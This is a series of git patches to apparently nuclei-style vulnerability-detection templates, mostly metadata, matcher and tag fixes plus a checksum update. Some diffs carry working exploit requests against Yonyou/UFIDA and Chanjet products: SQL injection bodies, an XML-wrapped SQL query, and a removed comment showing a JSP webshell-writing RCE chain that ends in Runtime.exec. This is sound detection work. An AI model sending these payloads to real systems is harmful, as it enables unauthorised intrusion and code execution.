   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
-    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
-    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
-    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 1baa17c0296d5797519daccb5689527c0d76ce18 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Sun, 17 Sep 2023 13:37:19 +0530
Subject: [PATCH 0401/1090] Fix FP -CVE-2023-2813

---
 http/cves/2023/CVE-2023-2813.yaml | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml
index 33694d615f..6a86ae1e1d 100644
--- a/http/cves/2023/CVE-2023-2813.yaml
+++ b/http/cves/2023/CVE-2023-2813.yaml
@@ -36,7 +36,10 @@ http:
       - type: word
         words:
           - ''
+          - 'wp-content'
+          - 'themes'
+        condition: and
 
       - type: status
         status:
-          - 200
+          - 200
\ No newline at end of file

From 0e4f7b0565356452b4c1c3fbec97726f5bf2bece Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Sun, 17 Sep 2023 13:41:16 +0530
Subject: [PATCH 0402/1090] Update CVE-2023-2813.yaml

---
 http/cves/2023/CVE-2023-2813.yaml | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml
index 6a86ae1e1d..ad3c1583ff 100644
--- a/http/cves/2023/CVE-2023-2813.yaml
+++ b/http/cves/2023/CVE-2023-2813.yaml
@@ -36,10 +36,9 @@ http:
       - type: word
         words:
           - ''
-          - 'wp-content'
-          - 'themes'
+          - 'wp-content/theme'
         condition: and
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200

From 274c14e7634b85a30a3b2b0a0ab4fa77b32cf0bd Mon Sep 17 00:00:00 2001
From: Prince Chaddha 
Date: Sun, 17 Sep 2023 14:21:38 +0530
Subject: [PATCH 0403/1090] updated-templates-p

---
 http/cnvd/2023/CNVD-C-2023-76801.yaml         | 20 ++++--------------
 http/cves/2022/CVE-2022-0342.yaml             |  4 ++--
 .../yonyou/chanjet-gnremote-sqli.yaml         | 12 +++--------
 .../yonyou/chanjet-tplus-file-read.yaml       |  7 ++++---
 .../yonyou/chanjet-tplus-fileupload.yaml      |  2 +-
 .../yonyou/chanjet-tplus-ufida-sqli.yaml      |  9 ++------
 .../yonyou/chanjetcrm-createsite-sqli.yaml    | 21 -------------------
 ...yonyou-filereceiveservlet-fileupload.yaml} |  4 ++--
 ...rp-u8-sqli.yaml => yonyou-grp-u8-xxe.yaml} | 19 +++++------------
 .../yonyou-nc-baseapp-deserialization.yaml    |  2 +-
 .../yonyou-nc-dispatcher-fileupload.yaml      |  2 +-
 .../yonyou-nc-grouptemplet-fileupload.yaml    |  2 +-
 .../yonyou-nc-ncmessageservlet-rce.yaml       |  4 ++--
 .../yonyou/yonyou-u8-crm-lfi.yaml             |  2 +-
 14 files changed, 29 insertions(+), 81 deletions(-)
 delete mode 100755 http/vulnerabilities/yonyou/chanjetcrm-createsite-sqli.yaml
 rename http/vulnerabilities/yonyou/{yonyou-nc-filereceiveservlet-fileupload..yaml => yonyou-filereceiveservlet-fileupload.yaml} (92%)
 rename http/vulnerabilities/yonyou/{yonyou-grp-u8-sqli.yaml => yonyou-grp-u8-xxe.yaml} (67%)

diff --git a/http/cnvd/2023/CNVD-C-2023-76801.yaml b/http/cnvd/2023/CNVD-C-2023-76801.yaml
index c7ae06c1f9..109fe81cce 100644
--- a/http/cnvd/2023/CNVD-C-2023-76801.yaml
+++ b/http/cnvd/2023/CNVD-C-2023-76801.yaml
@@ -1,11 +1,11 @@
-id: yonyou-nc-uapjs-jsinvoke-fileupload
+id: CNVD-C-2023-76801
 
 info:
-  name: Yonyou NC uapjs jsinvoke 文件上传漏洞
+  name: UFIDA NC uapjs - RCE vulnerability
   author: SleepingBag945
   severity: critical
-  description: 用友NC 及 NCC系统存在任意方法调用漏洞,通过uapjs (jsinvoke)利用漏洞可调用危险方法造成攻击。
-  tags: yonyou
+  description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
+  tags: cvnd,cvnd2023,yonyou,rce
 
 http:
   - raw:
@@ -28,15 +28,3 @@ http:
           - status_code_1 == 200
           - status_code_2 == 200 && contains(body_2,"{{randstr_2}}")
         condition: and
-
-
-# POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
-# Host: {{Hostname}}
-
-# {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}
-
-
-# POST /cmdb.jsp?error=bsh.Interpreter HTTP/1.1
-# Host: {{Hostname}}
-
-# cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml
index c4b5ea88a8..60728caed5 100644
--- a/http/cves/2022/CVE-2022-0342.yaml
+++ b/http/cves/2022/CVE-2022-0342.yaml
@@ -1,7 +1,7 @@
 id: CVE-2022-0342
 
 info:
-  name:  Zyxel - Authentication Bypass
+  name: Zyxel - Authentication Bypass
   author: SleepingBag945
   severity: critical
   description: |
@@ -10,7 +10,7 @@ info:
     max-request: 1
     fofa-query: app="ZyXEL-USG-FLEX"
     verified: true
-  tags: cve,cve2022,zyxel,auth-bypass
+  tags: cve,cve2022,zyxel,auth-bypass,router
 
 http:
   - method: GET
diff --git a/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml
index 3b30482133..7bf1c2d19c 100755
--- a/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml
+++ b/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml
@@ -1,11 +1,11 @@
 id: chanjet-gnremote-sqli
 
 info:
-  name:  Changjietong Remote Communication GNRemote.dll - SQL Injection
+  name: Changjietong Remote Communication GNRemote.dll - SQL Injection
   author: SleepingBag945
   severity: high
   description: |
-    Changjietong Information Technology Co., Ltd. is a company dedicated to providing platform services, application services, and data value-added services with financial and management services as its core to China's small and micro enterprises. Changjietong Information Technology Co., Ltd. Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
+    Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
   reference: |
     - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
   metadata:
@@ -38,14 +38,8 @@ http:
         part: body_1
         words:
           - "{\"RetCode\":0}"
-        condition: and
 
       - type: word
         part: body_2
         words:
-          - "{\"RetCode\":2}"
-        condition: and
-
-      - type: status
-        status:
-          - 200
\ No newline at end of file
+          - "{\"RetCode\":2}"
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml
index 71089b0995..b5c811de8b 100755
--- a/http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml
+++ b/http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml
@@ -28,6 +28,7 @@ http:
           - ""
         condition: and
 
-      - type: status
-        status:
-          - 200
\ No newline at end of file
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml
index 899a90ef99..9148cec707 100755
--- a/http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml
+++ b/http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml
@@ -3,7 +3,7 @@ id: chanjet-tplus-fileupload
 info:
   name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
   author: SleepingBag945
-  severity: critical
+  severity: high
   description: |
     There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
   reference:
diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml
index 21525c8bf3..1a2410251b 100755
--- a/http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml
+++ b/http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml
@@ -20,20 +20,15 @@ http:
         POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-        Accept-Encoding: gzip
 
         {"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""}
 
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "0x06d49632c9dc9bcb62aeaef99612ba6b"
           - "Message\":\"245"
           - "DatabaseException"
-        part: body
-        condition: and
-
-      - type: status
-        status:
-          - 200
\ No newline at end of file
+        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/chanjetcrm-createsite-sqli.yaml b/http/vulnerabilities/yonyou/chanjetcrm-createsite-sqli.yaml
deleted file mode 100755
index 16a3070ad4..0000000000
--- a/http/vulnerabilities/yonyou/chanjetcrm-createsite-sqli.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: chanjetcrm-createsite-sqli
-
-info:
-  name: Chanjetcrm - create_site SQL Injection
-  author: unknown
-  severity: critical
-  description: |
-    There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
-  reference:
-    - https://stack.chaitin.com/techblog/detail?id=10
-  tags: chanjetcrm,sqli
-
-http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/WebSer~1/create_site.php?site_id=1" 
-    matchers:
-      - type: word
-        words:
-          - "register fail,please again"
-        part: body
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-fileupload..yaml b/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml
similarity index 92%
rename from http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-fileupload..yaml
rename to http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml
index 2ffe88dd33..876afbcecc 100755
--- a/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-fileupload..yaml
+++ b/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml
@@ -1,4 +1,4 @@
-id: yonyou-nc-filereceiveservlet-fileupload
+id: yonyou-filereceiveservlet-fileupload
 
 info:
   name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
@@ -12,7 +12,7 @@ info:
     max-request: 1
     fofa-query: app="用友-UFIDA-NC"
     verified: true
-  tags: yonyou,nc,fileupload,intrusive
+  tags: yonyou,fileupload,intrusive
 
 variables:
   file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
diff --git a/http/vulnerabilities/yonyou/yonyou-grp-u8-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml
similarity index 67%
rename from http/vulnerabilities/yonyou/yonyou-grp-u8-sqli.yaml
rename to http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml
index 54685f19ff..07588ff47c 100755
--- a/http/vulnerabilities/yonyou/yonyou-grp-u8-sqli.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml
@@ -1,10 +1,10 @@
-id: yonyou-grp-u8-sqli
+id: yonyou-grp-u8-xxe
 
 info:
-  name: yonyou-grp-u8-sqli
+  name: Yonyou UFIDA GRP-u8 - XXE
   author: SleepingBag945
   severity: critical
-  description: 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载外部SQL语句,以及命令执行
+  description: UFIDA GRP-u8 has an XXE vulnerability. This vulnerability is caused by the application not loading external entities when parsing XML input, resulting in the loading of external SQL statements and command execution.
   reference:
     - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
   tags: yonyou,grp,xxe,sqli
@@ -14,26 +14,17 @@ http:
       - |
         POST /Proxy HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-        Accept: */*
         Content-Type: application/x-www-form-urlencoded
         Accept-Encoding: gzip
 
         cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
 
-
-
     matchers-condition: and
     matchers:
       - type: word
         words:
           - "1759837260"
+
       - type: word
         words:
-          - ""
-      - type: status
-        status:
-          - 200
-
-
-# 可尝试启动并调用xpcmdshell执行命令
\ No newline at end of file
+          - ""
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml
index 35cd23cd7d..6b27092331 100755
--- a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml
@@ -22,5 +22,5 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - 'status_code_1 == 200 && contains(body_1,"java.io")'
+          - 'status_code_1 == 200 && contains(body_1,"java.io") && contains(body_1,"EOFExceptionYI")'
         condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml
index e0948aa60f..b4398dc98e 100755
--- a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml
@@ -11,7 +11,7 @@ info:
   metadata:
     fofa-query: icon_hash="1085941792"
     verified: true
-  tags: yonyou,nc,intrusive
+  tags: yonyou,intrusive,fileupload
 
 http:
   - raw:
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
index 192ab5ea24..c6b814fe88 100755
--- a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
@@ -13,7 +13,7 @@ info:
     max-request: 2  
     fofa-query: app="用友-UFIDA-NC
     verified: true  
-  tags: yonyou,nc,intrusive
+  tags: yonyou,intrusive,ufida,fileupload
 
 variables:
   v1: "{{rand_int(1,100)}}"
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml
index 4ad07a32fd..fd6c9c0607 100644
--- a/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml
@@ -1,7 +1,7 @@
 id: yonyou-nc-ncmessageservlet-rce
 
 info:
-  name: UFIDA NC NCMessageServlet - Deserialization RCE Detect
+  name: UFIDA NC NCMessageServlet - Deserialization RCE Detection
   author: SleepingBag945
   severity: critical
   description: |
@@ -12,7 +12,7 @@ info:
     max-request: 2
     fofa-query: app="用友-UFIDA-NC
     verified: true
-  tags: yonyou,rce,deserialization,nc
+  tags: yonyou,rce,deserialization,rce
 
 http:
   - raw:
diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml
index 00c3279c2a..d9e88502a9 100644
--- a/http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml
@@ -1,7 +1,7 @@
 id: yonyou-u8-crm-lfi
 
 info:
-  name: UFIDA U8 CRM  getemaildata.php - Arbitrary File Read
+  name: UFIDA U8 CRM getemaildata.php - Arbitrary File Read
   author: SleepingBag945
   severity: high
   description: |

From fc7ca7cb09b72d3e6391be7cfdac25570739660a Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sun, 17 Sep 2023 14:25:39 +0000
Subject: [PATCH 0405/1090] Auto Generated Templates Checksum [Sun Sep 17
 14:25:39 UTC 2023] :robot:

---
 templates-checksum.txt | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 9088aeebe7..bcb5a0f278 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -507,7 +507,7 @@ helpers/wordpress/plugins/shortpixel-image-optimiser.txt:1d9a9eb3723d36c07bbcef1
 helpers/wordpress/plugins/simple-custom-post-order.txt:c696496c332f4053d974090a9c80d9d35ebc2ca6
 helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd
 helpers/wordpress/plugins/siteguard.txt:b26853e0fc7b2e0fccdc39c5fe508249d0d5d410
-helpers/wordpress/plugins/siteorigin-panels.txt:1a8a7a8a850823dcb9e92b6dc055d88b65330f21
+helpers/wordpress/plugins/siteorigin-panels.txt:fc4929308af8b80845b3c743a30013a669a02875
 helpers/wordpress/plugins/smart-slider-3.txt:2cddd46563a1ae6eca28eb577f99025fd04568f2
 helpers/wordpress/plugins/so-widgets-bundle.txt:6d762cc150e79ef408e1a9b5423c21aeb1d73f5b
 helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53
@@ -2563,7 +2563,7 @@ http/cves/2023/CVE-2023-27587.yaml:a819235770f464cbe1cb532b57fe34c919a7ff56
 http/cves/2023/CVE-2023-2780.yaml:db40792ff460986646151ea927034f5062b2c9f3
 http/cves/2023/CVE-2023-2796.yaml:b91a3cfc1eaf6a275aac33c7a58671633b3b6e12
 http/cves/2023/CVE-2023-28121.yaml:d2293698e26589be232d165d0739ad8349f5ad29
-http/cves/2023/CVE-2023-2813.yaml:02eb83b3e304fb859540c763c2ee3a2d47d4dba8
+http/cves/2023/CVE-2023-2813.yaml:7b86173267fd789769375bca520f5c820bfc1504
 http/cves/2023/CVE-2023-2822.yaml:b828499817000b8c193eeeabf2fbea5521ec4752
 http/cves/2023/CVE-2023-2825.yaml:4a18f1951a6cdbdc7b02226d6f6ae29e59188955
 http/cves/2023/CVE-2023-28343.yaml:214c6bc75489e9eb0564fd5fa72c6b4b7d2b3d9a
@@ -7074,7 +7074,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:f8f8caa7d751e88d5097cb4a901b11a372eb48d1
+templates-checksum.txt:b2b0b84f23893b3d3e7c9b80a8d2da7551d89dd5
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 1cdfc9af46b8c2781cb31119d2268a334c8196fb Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sun, 17 Sep 2023 14:27:17 +0000
Subject: [PATCH 0406/1090] TemplateMan Update [Sun Sep 17 14:27:17 UTC 2023]
 :robot:

---
 http/technologies/wordpress/plugins/ad-inserter.yaml             | 1 +
 http/technologies/wordpress/plugins/add-to-any.yaml              | 1 +
 http/technologies/wordpress/plugins/admin-menu-editor.yaml       | 1 +
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml  | 1 +
 http/technologies/wordpress/plugins/akismet.yaml                 | 1 +
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml          | 1 +
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml     | 1 +
 http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml   | 1 +
 http/technologies/wordpress/plugins/amp.yaml                     | 1 +
 http/technologies/wordpress/plugins/antispam-bee.yaml            | 1 +
 http/technologies/wordpress/plugins/astra-sites.yaml             | 1 +
 http/technologies/wordpress/plugins/astra-widgets.yaml           | 1 +
 http/technologies/wordpress/plugins/autoptimize.yaml             | 1 +
 http/technologies/wordpress/plugins/backwpup.yaml                | 1 +
 http/technologies/wordpress/plugins/better-search-replace.yaml   | 1 +
 http/technologies/wordpress/plugins/better-wp-security.yaml      | 1 +
 .../wordpress/plugins/black-studio-tinymce-widget.yaml           | 1 +
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml        | 1 +
 http/technologies/wordpress/plugins/breeze.yaml                  | 1 +
 http/technologies/wordpress/plugins/broken-link-checker.yaml     | 1 +
 .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 +
 http/technologies/wordpress/plugins/classic-editor.yaml          | 1 +
 http/technologies/wordpress/plugins/classic-widgets.yaml         | 1 +
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml            | 1 +
 http/technologies/wordpress/plugins/cmb2.yaml                    | 1 +
 http/technologies/wordpress/plugins/coblocks.yaml                | 1 +
 http/technologies/wordpress/plugins/code-snippets.yaml           | 1 +
 http/technologies/wordpress/plugins/coming-soon.yaml             | 1 +
 http/technologies/wordpress/plugins/complianz-gdpr.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 +
 http/technologies/wordpress/plugins/contact-form-7.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml      | 1 +
 http/technologies/wordpress/plugins/cookie-law-info.yaml         | 1 +
 http/technologies/wordpress/plugins/cookie-notice.yaml           | 1 +
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml      | 1 +
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml     | 1 +
 http/technologies/wordpress/plugins/custom-css-js.yaml           | 1 +
 http/technologies/wordpress/plugins/custom-fonts.yaml            | 1 +
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml     | 1 +
 http/technologies/wordpress/plugins/disable-comments.yaml        | 1 +
 http/technologies/wordpress/plugins/disable-gutenberg.yaml       | 1 +
 http/technologies/wordpress/plugins/duplicate-page.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicate-post.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicator.yaml              | 1 +
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml       | 1 +
 http/technologies/wordpress/plugins/easy-fancybox.yaml           | 1 +
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml  | 1 +
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/elementor.yaml               | 1 +
 http/technologies/wordpress/plugins/elementskit-lite.yaml        | 1 +
 http/technologies/wordpress/plugins/enable-media-replace.yaml    | 1 +
 http/technologies/wordpress/plugins/envato-elements.yaml         | 1 +
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml   | 1 +
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml    | 1 +
 .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 +
 http/technologies/wordpress/plugins/fast-indexing-api.yaml       | 1 +
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml       | 1 +
 http/technologies/wordpress/plugins/flamingo.yaml                | 1 +
 http/technologies/wordpress/plugins/fluentform.yaml              | 1 +
 http/technologies/wordpress/plugins/font-awesome.yaml            | 1 +
 .../wordpress/plugins/force-regenerate-thumbnails.yaml           | 1 +
 http/technologies/wordpress/plugins/formidable.yaml              | 1 +
 http/technologies/wordpress/plugins/forminator.yaml              | 1 +
 http/technologies/wordpress/plugins/ga-google-analytics.yaml     | 1 +
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml  | 1 +
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml     | 1 +
 .../wordpress/plugins/google-analytics-for-wordpress.yaml        | 1 +
 http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 +
 http/technologies/wordpress/plugins/google-site-kit.yaml         | 1 +
 .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 +
 http/technologies/wordpress/plugins/gtranslate.yaml              | 1 +
 http/technologies/wordpress/plugins/gutenberg.yaml               | 1 +
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml  | 1 +
 .../wordpress/plugins/header-footer-code-manager.yaml            | 1 +
 http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 +
 http/technologies/wordpress/plugins/header-footer.yaml           | 1 +
 http/technologies/wordpress/plugins/health-check.yaml            | 1 +
 http/technologies/wordpress/plugins/hello-dolly.yaml             | 1 +
 http/technologies/wordpress/plugins/host-webfonts-local.yaml     | 1 +
 http/technologies/wordpress/plugins/imagify.yaml                 | 1 +
 http/technologies/wordpress/plugins/imsanity.yaml                | 1 +
 .../wordpress/plugins/insert-headers-and-footers.yaml            | 1 +
 http/technologies/wordpress/plugins/instagram-feed.yaml          | 1 +
 .../wordpress/plugins/intuitive-custom-post-order.yaml           | 1 +
 http/technologies/wordpress/plugins/iwp-client.yaml              | 1 +
 http/technologies/wordpress/plugins/jetpack-boost.yaml           | 1 +
 http/technologies/wordpress/plugins/jetpack.yaml                 | 1 +
 http/technologies/wordpress/plugins/kadence-blocks.yaml          | 1 +
 http/technologies/wordpress/plugins/kirki.yaml                   | 1 +
 http/technologies/wordpress/plugins/leadin.yaml                  | 1 +
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml         | 1 +
 http/technologies/wordpress/plugins/limit-login-attempts.yaml    | 1 +
 http/technologies/wordpress/plugins/litespeed-cache.yaml         | 1 +
 http/technologies/wordpress/plugins/loco-translate.yaml          | 1 +
 http/technologies/wordpress/plugins/loginizer.yaml               | 1 +
 http/technologies/wordpress/plugins/loginpress.yaml              | 1 +
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml        | 1 +
